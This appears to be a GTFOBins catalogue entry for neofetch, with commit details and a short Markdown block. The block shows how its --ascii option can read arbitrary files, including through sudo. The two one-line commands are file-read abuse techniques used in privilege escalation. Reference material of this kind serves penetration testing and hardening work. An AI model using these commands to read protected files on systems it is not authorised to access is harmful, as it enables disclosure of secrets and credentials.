GTFOBins.github.io/_gtfobins/neofetch.md
Diego Tellaroli 2faea12b6e
Add neofetch
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2021-09-12 19:20:51 +02:00

13 lines
358 B
Markdown

---
description: The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files.
functions:
file-read:
- code: |
LFILE=file_to_read
neofetch --ascii $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo neofetch --ascii $LFILE
---